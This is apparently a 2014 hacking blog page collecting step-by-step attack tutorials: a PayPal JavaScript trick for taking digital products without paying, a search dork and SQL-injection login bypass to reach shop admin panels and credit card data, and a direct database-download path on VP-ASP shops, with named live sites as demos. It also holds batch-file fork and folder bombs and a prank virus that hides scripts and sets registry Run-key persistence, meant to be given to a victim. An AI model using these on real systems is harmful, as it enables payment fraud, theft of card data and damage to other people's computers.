Saturday, 8 March 2014

Paypal Javascript Exploit

                         Paypal Javascript Exploit


Here is a simple JavaScript exploit through which you can hack Paypal & download products for free without spending single penny . More then 500 sites are Vulnerable !! .










Step by Step Guide :


  • Go to the vulnerable site & paste the below JavaScript given below in the browser & hit enter ! .


javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);



  • So after you have hit enter, just sit back & enjoy the free product . 

Live Demo :~#


So after you paste the JavaScript in the URL then the product will be automatically downloaded :)



More Vulnerable sites link - http://pastebin.com/nLuSZb9J  (some sites are patched)

So as you all know that its will contain many details .But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks 

Admin Page Vulnerability | Hacking Credit Card

         

Admin Page Vulnerability | Hacking Credit Card


Here is the second part of Hacking Credit Card . Another easy & working Exploit .







Step By Step Guide :~#
  • Go to Google & type this Dork  -  inurl:\"/cart.php?m=\"
  • After that the Target URL will look like -   http://www.facesbyfelicia.com/store/cart.php?m=view (Demo) .
  • Then now we will find the admin page & hack into the website so we will modify the URL to find the Admin page 


Now you will be asked username & password so write this -
Username - 'or'1'='1
Password - 'or'1'='1

So as you all know that its will contain many credit card details as its a shopping site !But remember you can go behind the bars for this . Its a big Crime .We have provided this Tutorial to make all of you aware of such hacks .

VP-ASP Shopping Cart 5.00 Exploit

                  VP-ASP Shopping Cart 5.00 Exploit 



Here is a small exploit to Hack & Steal Credit card info & many other data from a site .







Step By Step Guide :~#



  • Go to Google & type this Dork  - intitle: VP-ASP Shopping Cart 5.00 l
  • After that the Target URL will look like -  www.tcsprogramming.net/shopping/diag_dbtest.asp  (Demo)
  • Then there you can see many details like xDatabase xDatabas Location xEmail & Many others  so the thing we have to do here site get the Database of that particular Website .
  • To get the database we will modify the URL 

Live Demo :

Target - www.tcsprogramming.net/shopping/diag_dbtest.asp
Exploit - http://www.tcsprogramming.net/shopping/shopping550.mdb

So here we have exploited the database  to get all the data of the website  . Just Replace the diag_dbtest.asp to shopping/shopping550.mdb (xDatabase) .

Enabling God Mode in Windows 7.


                           Enabling God Mode in Windows 7






In this post I will show you how you can enable God Mode on your windows 7 machine.
Which will bring all the windows setting under one hood without needing to browse options and folders in the Control Panel. The term “GOD MODE” is given by Microsoft Development Team.
Follow the steps described below-

1.Create a new folder.
2.Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  (you          can change the name GodMode to any name as you wish but remember not to change the text after GodMode.
3.The icon of your folder will change. Double click on it to open the GOD MODE window.

Caller ID Spoofing:Display any number when you call your friend.

Caller ID Spoofing:Display any number when you call your friend.


In this post I will be showing you guys how to do Caller ID Spoofing. It is basically a trick in which you can display any mobile number of your choice on your victims mobile when you call him. For performing this simple trick there is a very cool website called CrazyCall.



Deadly batch file Tricks

                        Deadly batch file  Tricks


1. Crash a Computer with just a link

Click Here (http://tiny.cc/ibJUN)


2. Folder Bomber
This batch file will create 3000+  folder in less than a minute.

Open your notepad and type the following codes.

@echo off

:top

md %random%

goto top


Save it as 3000.bat

Give this file to your friend and   when he will click on that his nightmare will be started.


Above Code Explained.

@echo off makes your command prompt window blank. md %random% is the command in MS-DOS to create random folders. (md is used for creating a folder and 


%random% means folders with random names.) goto top- retures the command to :top which causes an infinite loop.


2. Fork Bomber
It is  another batch file which ulitises 100% computer resources and memory 

making your computer irresponsive and at last your compuer hangs. Just copy 

and paste 


the below codes and save it as fork.bat
:s<br />start %0<br />%0|%0<br />goto :s<br />


3. Getting Blue Screen Of Death (BOSD)
You may be surprised to know that Windows has a built-in self-crashing mechanism (no pun intended). Though it is quite easy to crash a Windows box whenever 


you doesn't want it to crash, it may be quite difficult to reproduce the scenario, when you desperately want your box crashed. So here we give you two methods to 


crash your Windows box. 
Method 1: Windows Built-in Self Crasher
This method produces the 'awesome' BSOD (Blue Screen Of Death) that you are no doubt familiar with. The PC gets locked up and the only way to recover is to 


reboot it. Just follow these steps:


Run Regedit (Start -> Run -> regedit)
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters
Create a new DWORD value with name CrashOnCtrlScroll and give it a value 1
Reboot the PC
Now whenever you want to see the cute blue screen (and crash your system), press and hold the Ctrl key on the right side of the keyboard and hit the Scroll Lock key 


twice.


3. Prank Virus
Just copy and paste the below mentioned codes and see the fun. You can edit the codes to make i more funny or even deadly.
@echo off
echo Set oWMP=CreateObject("WMplayer.OCX.7")>>123.vbs
echo Set colCDROMs=oWMP.cdromCollection>>123.vbs
echo do>>123.vbs
echo if colCDROMs.count>=1 then>>123.vbs
echo for i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo For i=0 to colCDROMs.Count -1>>123.vbs
echo colCDROMs.Item(i).Eject>>123.vbs
echo Next>>123.vbs
echo End If>>123.vbs
echo wscript.sleep 5000>>123.vbs
echo loop>>123.vbs
echo DO>>1234.vbs
echo MSGBOX "YOU ARE SCREWED!!!!!!!!!!!!",64,"ErR0r">>1234.vbs
echo LOOP>>1234.vbs
copy /y 123.vbs C:\
copy /y 1234.vbs C:\
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\ /v NoClose /t REG_DWORD /f /d 1
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticetext /f /d "YOR ARE BEEN SCREWED"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\policies\system\ /v legalnoticecaption /f /d "B0zZ_ErR0r"
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 123.vbs /d c:\123.vbs
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v 1234.vbs /d c:\1234.vbs
attrib +s +h c:\123.vbs
attrib +s +h c:\1234.vbs
start 123.vbs
start 1234.vbs
echo Code Smahser owns your computer!!>>c:\almasmalik.txt
echo Code Smahser owns your computer!!>>d:\almasmalik.txt
echo Code Smahser owns your computer!!>>e:\almasmalik.txt
msg * MAY YOUR COMPUTER "REST IN PEACE"


5. Open Command Prompt Window infinite times untill your Computer Crashes
Just copy and paste the below codes to make your computer crash. (After you will restart your computer, it will be back to normal)
@echo off
:loop
start cmd.exe
goto loop
"cmd.exe" can be changed to any other program also like Calculator. For calculator use calc.exe, for My Computer use explorer.exe and so on.

The world have changed a lot, people have changed a lot

To be continued ...